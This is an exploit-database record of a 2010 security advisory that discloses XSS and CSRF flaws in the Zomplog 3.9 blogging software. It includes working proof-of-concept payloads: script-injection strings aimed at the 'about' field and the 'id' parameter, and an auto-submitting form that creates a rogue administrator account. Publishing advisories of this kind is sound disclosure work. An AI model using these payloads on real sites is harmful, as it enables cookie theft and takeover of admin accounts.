{"type": "zdt", "lastseen": "2016-04-20T02:15:17", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Zomplog 3.9 Multiple XSS & XSRF Vulnerabilities", "published": "2010-10-28T00:00:00", "href": "http://0day.today/exploit/description/14615", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for php platform in category web applications", "hash": "6db7254264dcb6113cbd4ea10de42bf6959d6ff420fb14b73526d23250ddf39c", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "===============================================\r\nZomplog 3.9 Multiple XSS & XSRF Vulnerabilities\r\n===============================================\r\n\r\nReference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_1.html\r\nProduct: Zomplog\r\nVendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )\r\nVulnerable Version: 3.9 and probably prior versions\r\nVendor Notification: 13 October 2010\r\nVulnerability Type: Stored XSS (Cross Site Scripting)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Medium\r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\r\n \r\nVulnerability Details:\r\nUser can execute arbitrary JavaScript code within the vulnerable application.\r\n \r\nThe vulnerability exists due to failure in the \"/admin/settings_menu.php\" script to properly sanitize user-supplied input in \"about\" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n \r\nAn attacker can use browser to exploit this vulnerability. The following PoC is available:\r\n \r\n<form action=\"http://host/admin/settings_menu.php\" method=\"post\" enctype=\"multipart/form-data\" name=\"main\">\r\n<input type=\"hidden\" name=\"Submit\" value=\"Submit \u00e2\u20ac\u00ba\u00e2\u20ac\u00ba\">\r\n<input type=\"hidden\" name=\"search\" value=\"1\">\r\n<input type=\"hidden\" name=\"teasers\" value=\"1\">\r\n<input type=\"hidden\" name=\"archive\" value=\"1\">\r\n<input type=\"hidden\" name=\"latestentries\" value=\"1\">\r\n<input type=\"hidden\" name=\"nr_entries\" value=\"10\">\r\n<input type=\"hidden\" name=\"latestcomments\" value=\"1\">\r\n<input type=\"hidden\" name=\"nr_comments\" value=\"10\">\r\n<input type=\"hidden\" name=\"categories\" value=\"1\">\r\n<input type=\"hidden\" name=\"authors\" value=\"1\">\r\n<input type=\"hidden\" name=\"pages\" value=\"1\">\r\n<input type=\"hidden\" name=\"meta\" value=\"1\">\r\n<input type=\"hidden\" name=\"login\" value=\"1\">\r\n<input type=\"hidden\" name=\"use_join\" value=\"1\">\r\n<input type=\"hidden\" name=\"powered\" value=\"1\">\r\n<input type=\"hidden\" name=\"about\" value='about\"><script>alert(document.cookie)</script>'>\r\n<input type=\"hidden\" name=\"customfield\" value=\"customfield\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n \r\n \r\n-----------------------------------------------------------------------------------------------------------------\r\n \r\nVulnerability ID: HTB22644\r\nReference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zomplog_2.html\r\nProduct: Zomplog\r\nVendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )\r\nVulnerable Version: 3.9 and probably prior versions\r\nVendor Notification: 13 October 2010\r\nVulnerability Type: XSS (Cross Site Scripting)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Medium\r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\r\n \r\nVulnerability Details:\r\nUser can execute arbitrary JavaScript code within the vulnerable application.\r\n \r\nThe vulnerability exists due to failure in the \"/admin/editor_pages.php\" script to properly sanitize user-supplied input in \"id\" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n \r\nAn attacker can use browser to exploit this vulnerability. The following PoC is available:\r\nhttp://host/admin/editor_pages.php?id=1'\"><script>alert(document.cookie)</script>\r\n \r\n \r\n-----------------------------------------------------------------------------------------------------------------\r\n \r\nVulnerability ID: HTB22645\r\nReference: http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html\r\nProduct: Zomplog\r\nVendor: Gerben Schmidt ( http://www.zomp.nl/zomplog/ )\r\nVulnerable Version: 3.9 and probably prior versions\r\nVendor Notification: 13 October 2010\r\nVulnerability Type: CSRF (Cross-Site Request Forgery)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Low\r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\r\n \r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the \"/admin/users.php\" script to properly verify the source of HTTP request.\r\n \r\nSuccessful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n \r\nAttacker can use browser to exploit this vulnerability. The following PoC is available:\r\n \r\n<form action=\"http://host/admin/users.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"login\" value=\"newuserlogin\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"password2\" value=\"password\">\r\n<input type=\"hidden\" name=\"admin\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\" name=\"submit\" value=\"Submit \u00e2\u20ac\u00ba\u00e2\u20ac\u00ba\">\r\n</form>\r\n<script>\r\ndocument.getElementById('btn').click();\r\n</script>\r\n\r\n\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-14615", "sourceHref": "http://0day.today/exploit/14615", "modified": "2010-10-28T00:00:00", "reporter": "High-Tech Bridge", "enchantments": {"vulnersScore": 6.0}}

{"result": {}}